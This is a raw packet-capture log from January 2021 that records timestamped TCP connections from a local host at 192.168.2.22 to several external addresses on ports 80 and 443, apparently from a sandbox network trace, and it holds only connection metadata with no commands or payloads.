                                                                    Jan 26, 2021 06:54:56.288374901 CET4916580192.168.2.22172.217.6.174
                                                                    Jan 26, 2021 06:54:56.291138887 CET4916580192.168.2.22172.217.6.174
                                                                    Jan 26, 2021 06:54:56.420181036 CET8049165172.217.6.174192.168.2.22
                                                                    Jan 26, 2021 06:54:56.420243025 CET8049165172.217.6.174192.168.2.22
                                                                    Jan 26, 2021 06:54:56.420275927 CET8049165172.217.6.174192.168.2.22
                                                                    Jan 26, 2021 06:54:56.420558929 CET4916580192.168.2.22172.217.6.174
                                                                    Jan 26, 2021 06:54:56.469485044 CET49166443192.168.2.22104.21.88.166
                                                                    Jan 26, 2021 06:54:56.484630108 CET44349166104.21.88.166192.168.2.22
                                                                    Jan 26, 2021 06:54:56.484807014 CET49166443192.168.2.22104.21.88.166
                                                                    Jan 26, 2021 06:54:56.494998932 CET49166443192.168.2.22104.21.88.166
                                                                    Jan 26, 2021 06:54:56.510116100 CET44349166104.21.88.166192.168.2.22
                                                                    Jan 26, 2021 06:54:56.514756918 CET44349166104.21.88.166192.168.2.22
                                                                    Jan 26, 2021 06:54:56.514801025 CET44349166104.21.88.166192.168.2.22
                                                                    Jan 26, 2021 06:54:56.514919996 CET49166443192.168.2.22104.21.88.166
                                                                    Jan 26, 2021 06:54:56.522449970 CET49166443192.168.2.22104.21.88.166
                                                                    Jan 26, 2021 06:54:56.537511110 CET44349166104.21.88.166192.168.2.22
                                                                    Jan 26, 2021 06:54:56.537637949 CET44349166104.21.88.166192.168.2.22
                                                                    Jan 26, 2021 06:54:56.737459898 CET49166443192.168.2.22104.21.88.166
                                                                    Jan 26, 2021 06:54:56.773097038 CET49166443192.168.2.22104.21.88.166
                                                                    Jan 26, 2021 06:54:56.788326025 CET44349166104.21.88.166192.168.2.22
                                                                    Jan 26, 2021 06:54:56.793998957 CET44349166104.21.88.166192.168.2.22
                                                                    Jan 26, 2021 06:54:56.794053078 CET44349166104.21.88.166192.168.2.22
                                                                    Jan 26, 2021 06:54:56.794104099 CET44349166104.21.88.166192.168.2.22
                                                                    Jan 26, 2021 06:54:56.794145107 CET44349166104.21.88.166192.168.2.22
                                                                    Jan 26, 2021 06:54:56.794199944 CET44349166104.21.88.166192.168.2.22
                                                                    Jan 26, 2021 06:54:56.794251919 CET44349166104.21.88.166192.168.2.22
                                                                    Jan 26, 2021 06:54:56.794284105 CET49166443192.168.2.22104.21.88.166
                                                                    Jan 26, 2021 06:54:56.794286966 CET44349166104.21.88.166192.168.2.22
                                                                    Jan 26, 2021 06:54:56.794325113 CET49166443192.168.2.22104.21.88.166
                                                                    Jan 26, 2021 06:54:56.794331074 CET49166443192.168.2.22104.21.88.166
                                                                    Jan 26, 2021 06:54:56.849242926 CET4916780192.168.2.2245.138.97.75
                                                                    Jan 26, 2021 06:54:56.864762068 CET804916745.138.97.75192.168.2.22
                                                                    Jan 26, 2021 06:54:56.864886999 CET4916780192.168.2.2245.138.97.75
                                                                    Jan 26, 2021 06:54:56.864958048 CET4916780192.168.2.2245.138.97.75
                                                                    Jan 26, 2021 06:54:56.880371094 CET804916745.138.97.75192.168.2.22
                                                                    Jan 26, 2021 06:54:56.882874966 CET804916745.138.97.75192.168.2.22
                                                                    Jan 26, 2021 06:54:56.938870907 CET4916880192.168.2.22212.227.200.73
                                                                    Jan 26, 2021 06:54:56.958679914 CET8049168212.227.200.73192.168.2.22
                                                                    Jan 26, 2021 06:54:56.958873034 CET4916880192.168.2.22212.227.200.73
                                                                    Jan 26, 2021 06:54:56.959074974 CET4916880192.168.2.22212.227.200.73
                                                                    Jan 26, 2021 06:54:56.978651047 CET8049168212.227.200.73192.168.2.22
                                                                    Jan 26, 2021 06:54:57.002635002 CET49166443192.168.2.22104.21.88.166
                                                                    Jan 26, 2021 06:54:57.029058933 CET8049168212.227.200.73192.168.2.22
                                                                    Jan 26, 2021 06:54:57.074439049 CET49169443192.168.2.22212.227.200.73
                                                                    Jan 26, 2021 06:54:57.095340014 CET44349169212.227.200.73192.168.2.22
                                                                    Jan 26, 2021 06:54:57.095525980 CET49169443192.168.2.22212.227.200.73
                                                                    Jan 26, 2021 06:54:57.096139908 CET49169443192.168.2.22212.227.200.73
                                                                    Jan 26, 2021 06:54:57.096163988 CET4916780192.168.2.2245.138.97.75
                                                                    Jan 26, 2021 06:54:57.097547054 CET804916745.138.97.75192.168.2.22
                                                                    Jan 26, 2021 06:54:57.097625971 CET4916780192.168.2.2245.138.97.75
                                                                    Jan 26, 2021 06:54:57.116935015 CET44349169212.227.200.73192.168.2.22
                                                                    Jan 26, 2021 06:54:57.119457960 CET44349169212.227.200.73192.168.2.22
                                                                    Jan 26, 2021 06:54:57.119519949 CET44349169212.227.200.73192.168.2.22
                                                                    Jan 26, 2021 06:54:57.119563103 CET44349169212.227.200.73192.168.2.22
                                                                    Jan 26, 2021 06:54:57.119663000 CET49169443192.168.2.22212.227.200.73
                                                                    Jan 26, 2021 06:54:57.135108948 CET49169443192.168.2.22212.227.200.73
                                                                    Jan 26, 2021 06:54:57.156644106 CET44349169212.227.200.73192.168.2.22
                                                                    Jan 26, 2021 06:54:57.177316904 CET49169443192.168.2.22212.227.200.73
                                                                    Jan 26, 2021 06:54:57.238120079 CET44349169212.227.200.73192.168.2.22
                                                                    Jan 26, 2021 06:54:57.240278006 CET4916880192.168.2.22212.227.200.73
                                                                    Jan 26, 2021 06:54:57.248837948 CET8049168212.227.200.73192.168.2.22
                                                                    Jan 26, 2021 06:54:57.249486923 CET4916880192.168.2.22212.227.200.73
                                                                    Jan 26, 2021 06:54:57.260124922 CET44349169212.227.200.73192.168.2.22
                                                                    Jan 26, 2021 06:54:57.260190010 CET44349169212.227.200.73192.168.2.22
                                                                    Jan 26, 2021 06:54:57.260351896 CET49169443192.168.2.22212.227.200.73
                                                                    Jan 26, 2021 06:54:57.304125071 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:57.319128036 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:57.319308996 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:57.319745064 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:57.334685087 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:57.334748983 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:57.334806919 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:57.334857941 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:57.334896088 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:57.334960938 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:57.335012913 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:57.335607052 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:57.351288080 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:57.366558075 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:57.579896927 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:57.589299917 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:57.589448929 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.099297047 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.161375046 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.340678930 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.340739012 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.340776920 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.340818882 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.340861082 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.340900898 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.340913057 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.340943098 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.340948105 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.340982914 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.341001987 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.341061115 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.341610909 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.341655970 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.341784000 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.342706919 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.342746973 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.342875004 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.343805075 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.408129930 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.408190966 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.408230066 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.408272028 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.408438921 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.408479929 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.408524990 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.408581018 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.409676075 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.409732103 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.409832954 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.410675049 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.410720110 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.410810947 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.411775112 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.411815882 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.411860943 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.412863016 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.412905931 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.412971020 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.413980961 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.414035082 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.414124966 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.415076971 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.415117979 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.415206909 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.416147947 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.416189909 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.416254997 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.417249918 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.417292118 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.417365074 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.418378115 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.418421030 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.418507099 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.423414946 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.423455000 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.423505068 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.423547983 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.423556089 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.423587084 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.423628092 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.423640013 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.423669100 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.423708916 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.423710108 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.423749924 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.423789978 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.423829079 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.423840046 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.423882961 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.423954964 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.424782991 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.424839973 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.424920082 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.425621033 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.425666094 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.425740004 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.425765038 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.426491976 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.426713943 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.426754951 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.426851034 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.427805901 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.427856922 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.428184032 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.428256989 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.428911924 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.428956032 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.429064035 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.478849888 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.478907108 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.478955984 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.478991032 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.479029894 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.479058981 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.479079008 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.479095936 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.479120016 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.479160070 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.479198933 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.479207039 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.479831934 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.479872942 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.479923964 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.479929924 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.479969025 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.480007887 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.480056047 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.480712891 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.480758905 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.480798006 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.480839014 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.480844975 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.480878115 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.480954885 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.481201887 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.481565952 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.481616020 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.481659889 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.481697083 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.481738091 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.481740952 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.482446909 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.482491016 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.482528925 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.482544899 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.482568979 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.482595921 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.482609987 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.483315945 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.483355999 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.483403921 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.483407021 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.483448029 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.483485937 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.483552933 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.483618975 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.484200001 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.484242916 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.484281063 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.484321117 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.484335899 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.484359026 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.484400988 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.485097885 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.485140085 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.485177994 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.485239983 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.485240936 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.485280037 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.485348940 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.485970020 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.486012936 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.486057997 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.486100912 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.486104012 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.486140966 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.486212969 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.486268044 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.494196892 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.494256020 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.494296074 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.494337082 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.494376898 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.494426966 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.494434118 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.494463921 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.494471073 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.494501114 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.494560957 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.496171951 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496227980 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496269941 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496282101 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.496310949 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496361017 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496371984 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.496439934 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.496458054 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496499062 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496539116 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496577024 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496581078 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.496618986 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.496655941 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.497348070 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.497420073 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.497458935 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.497498989 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.497514963 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.497540951 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.497612000 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.498254061 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.498296976 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.498337030 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.498374939 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.498378992 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.498414993 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.498487949 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.499063015 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.499103069 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.499186993 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.499397993 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.535517931 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535577059 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535614967 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535655022 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535692930 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535712004 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.535742044 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535758972 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.535785913 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535825014 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535831928 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.535865068 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535906076 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535907030 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.535943985 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535984039 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.535986900 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.536015034 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536109924 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.536324024 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536367893 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536406994 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536444902 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536458969 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.536484957 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536523104 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536530972 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.536570072 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536612988 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536652088 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.536658049 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.536729097 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.537128925 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537172079 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537209034 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537249088 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537250996 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.537286043 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537329912 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.537333965 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537378073 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537444115 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537482023 CET44349170192.0.78.20192.168.2.22
                                                                    Jan 26, 2021 06:54:58.537492037 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.537558079 CET49170443192.168.2.22192.0.78.20
                                                                    Jan 26, 2021 06:54:58.538122892 CET44349170192.0.78.20192.168.2.22
